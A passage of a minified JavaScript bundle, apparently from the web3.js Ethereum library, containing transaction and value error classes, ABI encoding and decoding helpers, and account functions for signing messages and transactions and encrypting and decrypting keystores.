                        super(`nonce: ${null !== (t = e.nonce) && void 0 !== t ? t : "undefined"}, chainId: ${null !== (r = e.chainId) && void 0 !== r ? r : "undefined"}`, "Nonce or chainId is lower than 0"), this.code = n.ERR_TX_INVALID_NONCE_OR_CHAIN_ID;
                    }
                }
                t.InvalidNonceOrChainIdError = R;
                class I extends i.InvalidValueError {
                    constructor(){
                        super("UnableToPopulateNonceError", "unable to populate nonce, no from address available"), this.code = n.ERR_TX_UNABLE_TO_POPULATE_NONCE;
                    }
                }
                t.UnableToPopulateNonceError = I;
                class S extends i.InvalidValueError {
                    constructor(){
                        super("Eip1559NotSupportedError", "Network doesn't support eip-1559"), this.code = n.ERR_TX_UNSUPPORTED_EIP_1559;
                    }
                }
                t.Eip1559NotSupportedError = S;
                class P extends i.InvalidValueError {
                    constructor(e){
                        super(e, "unsupported transaction type"), this.code = n.ERR_TX_UNSUPPORTED_TYPE;
                    }
                }
                t.UnsupportedTransactionTypeError = P;
                class O extends i.InvalidValueError {
                    constructor(e){
                        var t, r;
                        super(`data: ${null !== (t = e.data) && void 0 !== t ? t : "undefined"}, input: ${null !== (r = e.input) && void 0 !== r ? r : "undefined"}`, 'You can\'t have "data" and "input" as properties of transactions at the same time, please use either "data" or "input" instead.'), this.code = n.ERR_TX_DATA_AND_INPUT;
                    }
                }
                t.TransactionDataAndInputError = O;
                class x extends i.BaseWeb3Error {
                    constructor(e){
                        super(`The connected Ethereum Node did not respond within ${e.numberOfSeconds} seconds, please make sure your transaction was properly sent and you are connected to a healthy Node. Be aware that transaction might still be pending or mined!\n\tTransaction Hash: ${e.transactionHash ? e.transactionHash.toString() : "not available"}`), this.code = n.ERR_TX_SEND_TIMEOUT;
                    }
                }
                function M(e) {
                    return `Please make sure your transaction was properly sent and there no pervious pending transaction for the same account. However, be aware that it might still be mined!\n\tTransaction Hash: ${e ? e.toString() : "not available"}`;
                }
                t.TransactionSendTimeoutError = x;
                class B extends i.BaseWeb3Error {
                    constructor(e){
                        super(`Transaction was not mined within ${e.numberOfSeconds} seconds. ${M(e.transactionHash)}`), this.code = n.ERR_TX_POLLING_TIMEOUT;
                    }
                }
                t.TransactionPollingTimeoutError = B;
                class N extends i.BaseWeb3Error {
                    constructor(e){
                        super(`Transaction started at ${e.starterBlockNumber} but was not mined within ${e.numberOfBlocks} blocks. ${M(e.transactionHash)}`), this.code = n.ERR_TX_BLOCK_TIMEOUT;
                    }
                }
                t.TransactionBlockTimeoutError = N;
                class C extends i.InvalidValueError {
                    constructor(e){
                        var t, r;
                        super(`receipt: ${JSON.stringify(e.receipt)}, blockHash: ${null === (t = e.blockHash) || void 0 === t ? void 0 : t.toString()}, transactionHash: ${null === (r = e.transactionHash) || void 0 === r ? void 0 : r.toString()}`, "Receipt missing or blockHash null"), this.code = n.ERR_TX_RECEIPT_MISSING_OR_BLOCKHASH_NULL;
                    }
                }
                t.TransactionMissingReceiptOrBlockHashError = C;
                class k extends i.InvalidValueError {
                    constructor(e){
                        super(`receipt: ${JSON.stringify(e.receipt)}`, "Receipt missing block number"), this.code = n.ERR_TX_RECEIPT_MISSING_BLOCK_NUMBER;
                    }
                }
                t.TransactionReceiptMissingBlockNumberError = k;
                class L extends i.BaseWeb3Error {
                    constructor(e){
                        super(`Invalid signature. "${e}"`), this.code = n.ERR_TX_SIGNING;
                    }
                }
                t.TransactionSigningError = L;
                class F extends i.InvalidValueError {
                    constructor(){
                        super("LocalWalletNotAvailableError", "Attempted to index account in local wallet, but no wallet is available"), this.code = n.ERR_TX_LOCAL_WALLET_NOT_AVAILABLE;
                    }
                }
                t.LocalWalletNotAvailableError = F;
                class D extends i.BaseWeb3Error {
                    constructor(e, t){
                        const r = [];
                        e.forEach((e)=>r.push(e.keyword.match(/data.(.+)/)[1])), super(`The following properties are invalid for the transaction type ${t}: ${r.join(", ")}`), this.code = n.ERR_TX_INVALID_PROPERTIES_FOR_TYPE;
                    }
                }
                t.InvalidPropertiesForTransactionTypeError = D;
            },
            4618: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.InvalidTypeAbiInputError = t.InvalidBlockError = t.InvalidLargeValueError = t.InvalidSizeError = t.InvalidUnsignedIntegerError = t.InvalidBooleanError = t.InvalidTypeError = t.NibbleWidthError = t.HexProcessingError = t.InvalidUnitError = t.InvalidStringError = t.InvalidAddressError = t.InvalidNumberError = t.InvalidBytesError = void 0;
                const n = r(7639), i = r(3685);
                class o extends i.InvalidValueError {
                    constructor(e){
                        super(e, "can not parse as byte data"), this.code = n.ERR_INVALID_BYTES;
                    }
                }
                t.InvalidBytesError = o;
                class s extends i.InvalidValueError {
                    constructor(e){
                        super(e, "can not parse as number data"), this.code = n.ERR_INVALID_NUMBER;
                    }
                }
                t.InvalidNumberError = s;
                class a extends i.InvalidValueError {
                    constructor(e){
                        super(e, "invalid ethereum address"), this.code = n.ERR_INVALID_ADDRESS;
                    }
                }
                t.InvalidAddressError = a;
                class u extends i.InvalidValueError {
                    constructor(e){
                        super(e, "not a valid string"), this.code = n.ERR_INVALID_STRING;
                    }
                }
                t.InvalidStringError = u;
                class c extends i.InvalidValueError {
                    constructor(e){
                        super(e, "invalid unit"), this.code = n.ERR_INVALID_UNIT;
                    }
                }
                t.InvalidUnitError = c;
                class l extends i.InvalidValueError {
                    constructor(e){
                        super(e, "can not be converted to hex"), this.code = n.ERR_INVALID_HEX;
                    }
                }
                t.HexProcessingError = l;
                class d extends i.InvalidValueError {
                    constructor(e){
                        super(e, "value greater than the nibble width"), this.code = n.ERR_INVALID_NIBBLE_WIDTH;
                    }
                }
                t.NibbleWidthError = d;
                class h extends i.InvalidValueError {
                    constructor(e){
                        super(e, "invalid type, type not supported"), this.code = n.ERR_INVALID_TYPE;
                    }
                }
                t.InvalidTypeError = h;
                class f extends i.InvalidValueError {
                    constructor(e){
                        super(e, "not a valid boolean."), this.code = n.ERR_INVALID_BOOLEAN;
                    }
                }
                t.InvalidBooleanError = f;
                class p extends i.InvalidValueError {
                    constructor(e){
                        super(e, "not a valid unsigned integer."), this.code = n.ERR_INVALID_UNSIGNED_INTEGER;
                    }
                }
                t.InvalidUnsignedIntegerError = p;
                class m extends i.InvalidValueError {
                    constructor(e){
                        super(e, "invalid size given."), this.code = n.ERR_INVALID_SIZE;
                    }
                }
                t.InvalidSizeError = m;
                class g extends i.InvalidValueError {
                    constructor(e){
                        super(e, "value is larger than size."), this.code = n.ERR_INVALID_LARGE_VALUE;
                    }
                }
                t.InvalidLargeValueError = g;
                class y extends i.InvalidValueError {
                    constructor(e){
                        super(e, "invalid string given"), this.code = n.ERR_INVALID_BLOCK;
                    }
                }
                t.InvalidBlockError = y;
                class v extends i.InvalidValueError {
                    constructor(e){
                        super(e, "components found but type is not tuple"), this.code = n.ERR_INVALID_TYPE_ABI;
                    }
                }
                t.InvalidTypeAbiInputError = v;
            },
            5071: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), i(r(7639), t), i(r(3685), t), i(r(8105), t), i(r(3789), t), i(r(510), t), i(r(1591), t), i(r(7297), t), i(r(7108), t), i(r(1075), t), i(r(8450), t), i(r(4618), t), i(r(9491), t), i(r(3628), t), i(r(655), t);
            },
            3685: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.InvalidValueError = t.BaseWeb3Error = void 0;
                class r extends Error {
                    constructor(e, t){
                        super(e), this.innerError = t, this.name = this.constructor.name, "function" == typeof Error.captureStackTrace ? Error.captureStackTrace(new.target.constructor) : this.stack = (new Error).stack;
                    }
                    static convertToString(e, t = !1) {
                        if (null == e) return "undefined";
                        const r = JSON.stringify(e, (e, t)=>"bigint" == typeof t ? t.toString() : t);
                        return t && [
                            "bigint",
                            "string"
                        ].includes(typeof e) ? r.replace(/['\\"]+/g, "") : r;
                    }
                    toJSON() {
                        return {
                            name: this.name,
                            code: this.code,
                            message: this.message,
                            innerError: this.innerError
                        };
                    }
                }
                t.BaseWeb3Error = r, t.InvalidValueError = class extends r {
                    constructor(e, t){
                        super(`Invalid value given "${r.convertToString(e, !0)}". Error: ${t}.`), this.name = this.constructor.name;
                    }
                };
            },
            9722: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.encodeErrorSignature = void 0;
                const n = r(9634), i = r(5071), o = r(1583);
                t.encodeErrorSignature = (e)=>{
                    if ("string" != typeof e && !(0, o.isAbiErrorFragment)(e)) throw new i.AbiError("Invalid parameter value in encodeErrorSignature");
                    let t;
                    return t = !e || "function" != typeof e && "object" != typeof e ? e : (0, o.jsonInterfaceMethodToString)(e), (0, n.sha3Raw)(t);
                };
            },
            5893: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.encodeEventSignature = void 0;
                const n = r(9634), i = r(5071), o = r(1583);
                t.encodeEventSignature = (e)=>{
                    if ("string" != typeof e && !(0, o.isAbiEventFragment)(e)) throw new i.AbiError("Invalid parameter value in encodeEventSignature");
                    let t;
                    return t = !e || "function" != typeof e && "object" != typeof e ? e : (0, o.jsonInterfaceMethodToString)(e), (0, n.sha3Raw)(t);
                };
            },
            3249: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.encodeFunctionCall = t.encodeFunctionSignature = void 0;
                const n = r(5071), i = r(9634), o = r(1583), s = r(4566);
                t.encodeFunctionSignature = (e)=>{
                    if ("string" != typeof e && !(0, o.isAbiFunctionFragment)(e)) throw new n.AbiError("Invalid parameter value in encodeFunctionSignature");
                    let t;
                    return t = !e || "function" != typeof e && "object" != typeof e ? e : (0, o.jsonInterfaceMethodToString)(e), (0, i.sha3Raw)(t).slice(0, 10);
                }, t.encodeFunctionCall = (e, r)=>{
                    var i;
                    if (!(0, o.isAbiFunctionFragment)(e)) throw new n.AbiError("Invalid parameter value in encodeFunctionCall");
                    return `${(0, t.encodeFunctionSignature)(e)}${(0, s.encodeParameters)(null !== (i = e.inputs) && void 0 !== i ? i : [], null != r ? r : []).replace("0x", "")}`;
                };
            },
            734: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.decodeLog = void 0;
                const n = r(4566), i = [
                    "bool",
                    "string",
                    "int",
                    "uint",
                    "address",
                    "fixed",
                    "ufixed"
                ];
                t.decodeLog = (e, t, r)=>{
                    const o = Array.isArray(r) ? r : [
                        r
                    ], s = {}, a = {};
                    for (const [t, r] of e.entries())r.indexed ? s[t] = r : a[t] = r;
                    const u = t ? (0, n.decodeParametersWith)(Object.values(a), t, !0) : {
                        __length__: 0
                    }, c = o.length - Object.keys(s).length, l = Object.values(s).map((e, t)=>{
                        var r, s;
                        return i.some((t)=>e.type.startsWith(t)) ? (r = e.type, s = o[t + c], "string" === r ? s : (0, n.decodeParameter)(r, s)) : o[t + c];
                    }), d = {
                        __length__: 0
                    };
                    let h = 0, f = 0;
                    for (const [t, r] of e.entries())d[t] = "string" === r.type ? "" : void 0, s[t] && (d[t] = l[h], h += 1), a[t] && (d[t] = u[String(f)], f += 1), r.name && (d[r.name] = d[t]), d.__length__ += 1;
                    return d;
                };
            },
            4566: function(e, t, r) {
                "use strict";
                var n = this && this.__importDefault || function(e) {
                    return e && e.__esModule ? e : {
                        default: e
                    };
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.decodeParameter = t.decodeParameters = t.decodeParametersWith = t.encodeParameter = t.encodeParameters = void 0;
                const i = r(5071), o = r(3260), s = n(r(5228)), a = r(1583);
                t.encodeParameters = (e, t)=>{
                    try {
                        const r = (0, a.mapTypes)(Array.isArray(e) ? e : [
                            e
                        ]), n = [];
                        for (const [e, i] of t.entries()){
                            const t = r[e];
                            let u;
                            u = (0, a.isAbiFragment)(t) && t.type ? t.type : t;
                            const c = (0, a.formatParam)(u, i);
                            if ("string" == typeof u && u.includes("tuple")) {
                                const e = s.default._getCoder(o.ParamType.from(u));
                                (0, a.modifyParams)(e, [
                                    c
                                ]);
                            }
                            n.push(c);
                        }
                        return s.default.encode(r.map((e)=>o.ParamType.from(e)), n);
                    } catch (e) {
                        throw new i.AbiError("Parameter encoding error", e);
                    }
                }, t.encodeParameter = (e, r)=>(0, t.encodeParameters)([
                        e
                    ], [
                        r
                    ]);
                const u = (e)=>Array.isArray(e) && Object.keys(e).filter((e)=>Number.isInteger(+e)).length !== Object.keys(e).length, c = (e)=>{
                    const t = {
                        __length__: 0
                    };
                    for (const r of Object.keys(e))t[r] = Array.isArray(e[r]) && u(e[r]) ? c(e[r]) : e[r], t.__length__ += Number.isInteger(+r) ? 1 : 0;
                    return t;
                };
                t.decodeParametersWith = (e, t, r)=>{
                    try {
                        if (e.length > 0 && (!t || "0x" === t || "0X" === t)) throw new i.AbiError("Returned values aren't valid, did it run Out of Gas? You might also see this error if you are not using the correct ABI for the contract you are retrieving data from, requesting data from a block number that does not exist, or querying a node which is not fully synced.");
                        const n = s.default.decode((0, a.mapTypes)(e).map((e)=>o.ParamType.from(e)), `0x${t.replace(/0x/i, "")}`, r);
                        return c(n);
                    } catch (e) {
                        throw new i.AbiError(`Parameter decoding error: ${e.message}`);
                    }
                }, t.decodeParameters = (e, r)=>(0, t.decodeParametersWith)(e, r, !1), t.decodeParameter = (e, r)=>(0, t.decodeParameters)([
                        e
                    ], r)[0];
            },
            5610: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.decodeContractErrorData = void 0;
                const n = r(9722), i = r(4566), o = r(1583);
                t.decodeContractErrorData = (e, t)=>{
                    if (null == t ? void 0 : t.data) {
                        let r, s, a;
                        try {
                            const u = t.data.slice(0, 10), c = e.find((e)=>(0, n.encodeErrorSignature)(e).startsWith(u));
                            (null == c ? void 0 : c.inputs) && (r = c.name, s = (0, o.jsonInterfaceMethodToString)(c), a = (0, i.decodeParameters)([
                                ...c.inputs
                            ], t.data.substring(10)));
                        } catch (e) {
                            console.error(e);
                        }
                        r && t.setDecodedProperties(r, s, a);
                    }
                };
            },
            5228: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
                const n = new (r(3260)).AbiCoder((e, t)=>(null == t ? void 0 : t._isBigNumber) ? t.toBigInt() : t);
                t.default = n;
            },
            8381: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), i(r(9722), t), i(r(5893), t), i(r(3249), t), i(r(734), t), i(r(4566), t), i(r(1583), t), i(r(5610), t);
            },
            1583: function(e, t, r) {
                "use strict";
                var n = this && this.__importDefault || function(e) {
                    return e && e.__esModule ? e : {
                        default: e
                    };
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.jsonInterfaceMethodToString = t.flattenTypes = t.modifyParams = t.formatParam = t.formatOddHexstrings = t.isOddHexstring = t.mapTypes = t.mapStructToCoderFormat = t.mapStructNameAndType = t.isSimplifiedStructFormat = t.isAbiConstructorFragment = t.isAbiFunctionFragment = t.isAbiEventFragment = t.isAbiErrorFragment = t.isAbiFragment = void 0;
                const i = r(5071), o = r(3260), s = r(9634), a = n(r(5228));
                t.isAbiFragment = (e)=>!(0, s.isNullish)(e) && "object" == typeof e && !(0, s.isNullish)(e.type) && [
                        "function",
                        "event",
                        "constructor",
                        "error"
                    ].includes(e.type), t.isAbiErrorFragment = (e)=>!(0, s.isNullish)(e) && "object" == typeof e && !(0, s.isNullish)(e.type) && "error" === e.type, t.isAbiEventFragment = (e)=>!(0, s.isNullish)(e) && "object" == typeof e && !(0, s.isNullish)(e.type) && "event" === e.type, t.isAbiFunctionFragment = (e)=>!(0, s.isNullish)(e) && "object" == typeof e && !(0, s.isNullish)(e.type) && "function" === e.type, t.isAbiConstructorFragment = (e)=>!(0, s.isNullish)(e) && "object" == typeof e && !(0, s.isNullish)(e.type) && "constructor" === e.type, t.isSimplifiedStructFormat = (e)=>"object" == typeof e && void 0 === e.components && void 0 === e.name, t.mapStructNameAndType = (e)=>e.includes("[]") ? {
                        type: "tuple[]",
                        name: e.slice(0, -2)
                    } : {
                        type: "tuple",
                        name: e
                    }, t.mapStructToCoderFormat = (e)=>{
                    const r = [];
                    for (const n of Object.keys(e)){
                        const i = e[n];
                        "object" == typeof i ? r.push(Object.assign(Object.assign({}, (0, t.mapStructNameAndType)(n)), {
                            components: (0, t.mapStructToCoderFormat)(i)
                        })) : r.push({
                            name: n,
                            type: e[n]
                        });
                    }
                    return r;
                }, t.mapTypes = (e)=>{
                    const r = [];
                    for (const n of e){
                        let e = n;
                        if ("object" == typeof n && (e = Object.assign({}, n)), "object" == typeof n && "function" === n.type && (e = Object.assign(Object.assign({}, n), {
                            type: "bytes24"
                        })), (0, t.isSimplifiedStructFormat)(e)) {
                            const n = Object.keys(e)[0];
                            r.push(Object.assign(Object.assign({}, (0, t.mapStructNameAndType)(n)), {
                                components: (0, t.mapStructToCoderFormat)(e[n])
                            }));
                        } else r.push(e);
                    }
                    return r;
                }, t.isOddHexstring = (e)=>"string" == typeof e && /^(-)?0x[0-9a-f]*$/i.test(e) && e.length % 2 == 1, t.formatOddHexstrings = (e)=>(0, t.isOddHexstring)(e) ? `0x0${e.substring(2)}` : e, t.formatParam = (e, r)=>{
                    var n;
                    const i = "object" != typeof r || Array.isArray(r) ? r : Object.assign({}, r);
                    if (i instanceof BigInt) return i.toString(10);
                    if (/^bytes([0-9]*)\[\]$/.exec(e) || /^(u?int)([0-9]*)\[\]$/.exec(e)) return [
                        ...i
                    ].map((r)=>(0, t.formatParam)(e.replace("[]", ""), r));
                    let o = /^(u?int)([0-9]*)$/.exec(e);
                    if (o) {
                        const e = parseInt(null !== (n = o[2]) && void 0 !== n ? n : "256", 10);
                        if (e / 8 < i.length) return (0, s.leftPad)(i, e);
                    }
                    if (o = /^bytes([0-9]*)$/.exec(e), o) {
                        const e = i instanceof Uint8Array ? (0, s.toHex)(i) : i, r = parseInt(o[1], 10);
                        if (r) {
                            let n = 2 * r;
                            i.startsWith("0x") && (n += 2);
                            const o = e.length < n ? (0, s.rightPad)(i, 2 * r) : e;
                            return (0, t.formatOddHexstrings)(o);
                        }
                        return (0, t.formatOddHexstrings)(e);
                    }
                    return i;
                }, t.modifyParams = (e, r)=>"array" === e.name ? r.map((r)=>(0, t.modifyParams)(a.default._getCoder(o.ParamType.from(e.type.replace("[]", ""))), [
                            r
                        ])) : (e.coders.forEach((e, n)=>{
                        "tuple" === e.name ? (0, t.modifyParams)(e, [
                            r[n]
                        ]) : r[n] = (0, t.formatParam)(e.name, r[n]);
                    }), []), t.flattenTypes = (e, r)=>{
                    const n = [];
                    return r.forEach((r)=>{
                        if ("object" == typeof r.components) {
                            if (!r.type.startsWith("tuple")) throw new i.AbiError(`Invalid value given "${r.type}". Error: components found but type is not tuple.`);
                            const o = r.type.indexOf("["), s = o >= 0 ? r.type.substring(o) : "", a = (0, t.flattenTypes)(e, r.components);
                            Array.isArray(a) && e ? n.push(`tuple(${a.join(",")})${s}`) : e ? n.push(`(${a.join()})`) : n.push(`(${a.join(",")})${s}`);
                        } else n.push(r.type);
                    }), n;
                }, t.jsonInterfaceMethodToString = (e)=>{
                    var r, n, i, o;
                    return (0, t.isAbiErrorFragment)(e) || (0, t.isAbiEventFragment)(e) || (0, t.isAbiFunctionFragment)(e) ? (null === (r = e.name) || void 0 === r ? void 0 : r.includes("(")) ? e.name : `${null !== (n = e.name) && void 0 !== n ? n : ""}(${(0, t.flattenTypes)(!1, null !== (i = e.inputs) && void 0 !== i ? i : []).join(",")})` : `(${(0, t.flattenTypes)(!1, null !== (o = e.inputs) && void 0 !== o ? o : []).join(",")})`;
                };
            },
            1560: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.decrypt = t.create = t.privateKeyToAccount = t.encrypt = t.privateKeyToAddress = t.recover = t.recoverTransaction = t.signTransaction = t.sign = t.hashMessage = t.parseAndValidatePrivateKey = void 0;
                const i = r(3072), o = r(8109), s = r(7002), a = r(5071), u = r(9634), c = r(7345), l = r(4555), d = r(5774), h = r(7668);
                t.parseAndValidatePrivateKey = (e, t)=>{
                    let r;
                    if (!t && "string" == typeof e && (0, c.isHexStrict)(e) && 66 !== e.length) throw new a.PrivateKeyLengthError;
                    try {
                        r = e instanceof Uint8Array ? e : (0, u.bytesToUint8Array)(e);
                    } catch (e) {
                        throw new a.InvalidPrivateKeyError;
                    }
                    if (!t && 32 !== r.byteLength) throw new a.PrivateKeyLengthError;
                    return r;
                }, t.hashMessage = (e)=>{
                    const t = (0, c.isHexStrict)(e) ? e : (0, u.utf8ToHex)(e), r = (0, u.hexToBytes)(t), n = (0, u.hexToBytes)((0, u.fromUtf8)(`Ethereum Signed Message:\n${r.byteLength}`)), i = (0, u.uint8ArrayConcat)(n, r);
                    return (0, u.sha3Raw)(i);
                }, t.sign = (e, r)=>{
                    const n = (0, t.parseAndValidatePrivateKey)(r), i = (0, t.hashMessage)(e), o = l.secp256k1.sign(i.substring(2), n), s = o.toCompactRawBytes(), a = o.r.toString(16), c = o.s.toString(16), d = o.recovery + 27;
                    return {
                        message: e,
                        messageHash: i,
                        v: (0, u.numberToHex)(d),
                        r: `0x${a}`,
                        s: `0x${c}`,
                        signature: `${(0, u.bytesToHex)(s)}${d.toString(16)}`
                    };
                }, t.signTransaction = (e, t)=>n(void 0, void 0, void 0, function*() {
                        const r = e.sign((0, u.hexToBytes)(t));
                        if ((0, c.isNullish)(r.v) || (0, c.isNullish)(r.r) || (0, c.isNullish)(r.s)) throw new a.TransactionSigningError("Signer Error");
                        const n = r.validate(!0);
                        if (n.length > 0) {
                            let e = "Signer Error ";
                            for (const t of n)e += `${e} ${t}.`;
                            throw new a.TransactionSigningError(e);
                        }
                        const i = (0, u.bytesToHex)(r.serialize()), o = (0, u.sha3Raw)(i);
                        return {
                            messageHash: (0, u.bytesToHex)(r.getMessageToSign(!0)),
                            v: `0x${r.v.toString(16)}`,
                            r: `0x${r.r.toString(16).padStart(64, "0")}`,
                            s: `0x${r.s.toString(16).padStart(64, "0")}`,
                            rawTransaction: i,
                            transactionHash: (0, u.bytesToHex)(o)
                        };
                    }), t.recoverTransaction = (e)=>{
                    if ((0, c.isNullish)(e)) throw new a.UndefinedRawTransactionError;
                    const t = h.TransactionFactory.fromSerializedData((0, u.hexToBytes)(e));
                    return (0, u.toChecksumAddress)(t.getSenderAddress().toString());
                }, t.recover = (e, r, n, i, o)=>{
                    if ("object" == typeof e) {
                        const r = `${e.r}${e.s.slice(2)}${e.v.slice(2)}`;
                        return (0, t.recover)(e.messageHash, r, n);
                    }
                    if ("string" == typeof r && "string" == typeof n && !(0, c.isNullish)(i)) {
                        const s = `${n}${i.slice(2)}${r.slice(2)}`;
                        return (0, t.recover)(e, s, o);
                    }
                    if ((0, c.isNullish)(r)) throw new a.InvalidSignatureError("signature string undefined");
                    const s = n ? e : (0, t.hashMessage)(e), d = r.substring(130), h = l.secp256k1.Signature.fromCompact(r.slice(2, 130)).addRecoveryBit(parseInt(d, 16) - 27).recoverPublicKey(s.replace("0x", "")).toRawBytes(!1), f = (0, u.sha3Raw)(h.subarray(1));
                    return (0, u.toChecksumAddress)(`0x${f.slice(-40)}`);
                }, t.privateKeyToAddress = (e)=>{
                    const r = (0, t.parseAndValidatePrivateKey)(e), n = l.secp256k1.getPublicKey(r, !1), i = (0, u.sha3Raw)(n.slice(1)).slice(-40);
                    return (0, u.toChecksumAddress)(`0x${i}`);
                }, t.encrypt = (e, r, l)=>n(void 0, void 0, void 0, function*() {
                        var n, d, h, f, p, m, g;
                        const y = (0, t.parseAndValidatePrivateKey)(e);
                        let v;
                        if (v = (null == l ? void 0 : l.salt) ? "string" == typeof l.salt ? (0, u.hexToBytes)(l.salt) : l.salt : (0, u.randomBytes)(32), !((0, c.isString)(r) || r instanceof Uint8Array)) throw new a.InvalidPasswordError;
                        const b = "string" == typeof r ? (0, u.hexToBytes)((0, u.utf8ToHex)(r)) : r;
                        let E;
                        if (null == l ? void 0 : l.iv) {
                            if (E = "string" == typeof l.iv ? (0, u.hexToBytes)(l.iv) : l.iv, 16 !== E.length) throw new a.IVLengthError;
                        } else E = (0, u.randomBytes)(16);
                        const A = null !== (n = null == l ? void 0 : l.kdf) && void 0 !== n ? n : "scrypt";
                        let _, w;
                        if ("pbkdf2" === A) {
                            if (w = {
                                dklen: null !== (d = null == l ? void 0 : l.dklen) && void 0 !== d ? d : 32,
                                salt: (0, u.bytesToHex)(v).replace("0x", ""),
                                c: null !== (h = null == l ? void 0 : l.c) && void 0 !== h ? h : 262144,
                                prf: "hmac-sha256"
                            }, w.c < 1e3) throw new a.PBKDF2IterationsError;
                            _ = (0, o.pbkdf2Sync)(b, v, w.c, w.dklen, "sha256");
                        } else {
                            if ("scrypt" !== A) throw new a.InvalidKdfError;
                            w = {
                                n: null !== (f = null == l ? void 0 : l.n) && void 0 !== f ? f : 8192,
                                r: null !== (p = null == l ? void 0 : l.r) && void 0 !== p ? p : 8,
                                p: null !== (m = null == l ? void 0 : l.p) && void 0 !== m ? m : 1,
                                dklen: null !== (g = null == l ? void 0 : l.dklen) && void 0 !== g ? g : 32,
                                salt: (0, u.bytesToHex)(v).replace("0x", "")
                            }, _ = (0, s.scryptSync)(b, v, w.n, w.p, w.r, w.dklen);
                        }
                        const T = yield (0, i.encrypt)(y, _.slice(0, 16), E, "aes-128-ctr"), R = (0, u.bytesToHex)(T).slice(2), I = (0, u.sha3Raw)((0, u.uint8ArrayConcat)(_.slice(16, 32), T)).replace("0x", "");
                        return {
                            version: 3,
                            id: (0, u.uuidV4)(),
                            address: (0, t.privateKeyToAddress)(y).toLowerCase().replace("0x", ""),
                            crypto: {
                                ciphertext: R,
                                cipherparams: {
                                    iv: (0, u.bytesToHex)(E).replace("0x", "")
                                },
                                cipher: "aes-128-ctr",
                                kdf: A,
                                kdfparams: w,
                                mac: I
                            }
                        };
                    }), t.privateKeyToAccount = (e, r)=>{
                    const i = (0, t.parseAndValidatePrivateKey)(e, r);
                    return {
                        address: (0, t.privateKeyToAddress)(i),
                        privateKey: (0, u.bytesToHex)(i),
                        signTransaction: (e)=>{
                            throw new a.TransactionSigningError("Do not have network access to sign the transaction");
                        },
                        sign: (e)=>(0, t.sign)("string" == typeof e ? e : JSON.stringify(e), i),
                        encrypt: (e, r)=>n(void 0, void 0, void 0, function*() {
                                return (0, t.encrypt)(i, e, r);
                            })
                    };
                }, t.create = ()=>{
                    const e = l.secp256k1.utils.randomPrivateKey();
                    return (0, t.privateKeyToAccount)(`${(0, u.bytesToHex)(e)}`);
                }, t.decrypt = (e, r, l)=>n(void 0, void 0, void 0, function*() {
                        const n = "object" == typeof e ? e : JSON.parse(l ? e.toLowerCase() : e);
                        if (c.validator.validateJSONSchema(d.keyStoreSchema, n), 3 !== n.version) throw new a.KeyStoreVersionError;
                        const h = "string" == typeof r ? (0, u.hexToBytes)((0, u.utf8ToHex)(r)) : r;
                        let f;
                        if (c.validator.validate([
                            "bytes"
                        ], [
                            h
                        ]), "scrypt" === n.crypto.kdf) {
                            const e = n.crypto.kdfparams, t = "string" == typeof e.salt ? (0, u.hexToBytes)(e.salt) : e.salt;
                            f = (0, s.scryptSync)(h, t, e.n, e.p, e.r, e.dklen);
                        } else {
                            if ("pbkdf2" !== n.crypto.kdf) throw new a.InvalidKdfError;
                            {
                                const e = n.crypto.kdfparams, t = "string" == typeof e.salt ? (0, u.hexToBytes)(e.salt) : e.salt;
                                f = (0, o.pbkdf2Sync)(h, t, e.c, e.dklen, "sha256");
                            }
                        }
                        const p = (0, u.hexToBytes)(n.crypto.ciphertext);
                        if ((0, u.sha3Raw)((0, u.uint8ArrayConcat)(f.slice(16, 32), p)).replace("0x", "") !== n.crypto.mac) throw new a.KeyDerivationError;
                        const m = yield (0, i.decrypt)((0, u.hexToBytes)(n.crypto.ciphertext), f.slice(0, 16), (0, u.hexToBytes)(n.crypto.cipherparams.iv));
                        return (0, t.privateKeyToAccount)(m);
                    });
            },
            7634: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
